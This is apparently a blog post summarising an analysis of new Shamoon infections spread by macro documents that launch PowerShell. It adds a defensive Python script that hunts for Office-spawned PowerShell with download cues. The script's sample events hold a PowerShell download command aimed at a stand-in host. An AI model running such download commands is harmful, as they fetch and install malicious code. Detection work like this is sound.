
    Hunting of new Shamoon infections

    Christiaan Beek published an article, “Analysis of new Shamoon infections”. Shamoon is malware that appears to have come back to the stage after a four-year holiday. It was originally discovered about four years ago as a result of the attacks against the Saudi Aramco oil company. Its intention was to destroy thousands of computers.

     

    In the article, Christiaan Beek analyzes Shamoon and demonstrates how the target PC is infected. The computer owner receives an email with an attached document. Opening the document starts a macro that runs a PowerShell script, which makes the target computer download malicious software. The article shows fragments of the PowerShell script and specifies the location within the computer’s memory where the system writes a temporary file. In addition, its “File locations & file names” section lists artifacts that allow a researcher to identify that a computer has been subjected to just such an attack. The author also points out “Interesting strings in code-samples” that can be used to identify the PowerShell script.
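One way to hunt for the chain described above (a document macro starting PowerShell that downloads software), as an added example that is not code from the article or from this post. The event field names, the download cue strings and the sample events are assumptions constructed for illustration; they are not Shamoon indicators from the article.

```python
import base64
import re

# Office applications whose macros can start a child process.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Generic download cues (assumed for this example; not IoCs from the article).
DOWNLOAD_CUES = ("downloadfile", "downloadstring", "net.webclient", "invoke-webrequest")
# -EncodedCommand and its abbreviations (-e, -enc, ...) followed by base64.
ENC_FLAG = re.compile(r"(?<!\S)-e[ncodema]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # invalid base64 or odd-length UTF-16 data
        return ""


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def hunt(events):
    """Flag PowerShell processes whose parent is an Office application."""
    findings = []
    for ev in events:
        parent = basename(ev["parent_image"])
        if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe") or parent not in OFFICE_PARENTS:
            continue
        # Inspect the visible command line and, if present, the decoded payload.
        text = (ev["cmdline"] + " " + decode_encoded_command(ev["cmdline"])).lower()
        cues = [c for c in DOWNLOAD_CUES if c in text]
        findings.append({"host": ev["host"], "parent": parent, "cues": cues,
                         "severity": "high" if cues else "medium"})
    return findings


# Constructed sample process-creation events (not from the article or real telemetry).
SAMPLE_PAYLOAD = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a','t.tmp')"
SAMPLE_ENC = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [dict(zip(("host", "parent_image", "image", "cmdline"), row)) for row in (
    ("PC-01", r"C:\Office\WINWORD.EXE", PS, "powershell -nop -enc " + SAMPLE_ENC),
    ("PC-02", r"C:\Windows\explorer.exe", PS, "powershell Invoke-WebRequest http://example.invalid/"),
    ("PC-03", r"C:\Office\EXCEL.EXE", PS, "powershell Get-Date"),
)]
```

Calling `hunt(SAMPLE_EVENTS)` flags PC-01 as high (Office parent plus download cues found only after decoding) and PC-03 as medium (Office parent, no download cue); PC-02 is not flagged because its parent is not an Office application.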

     



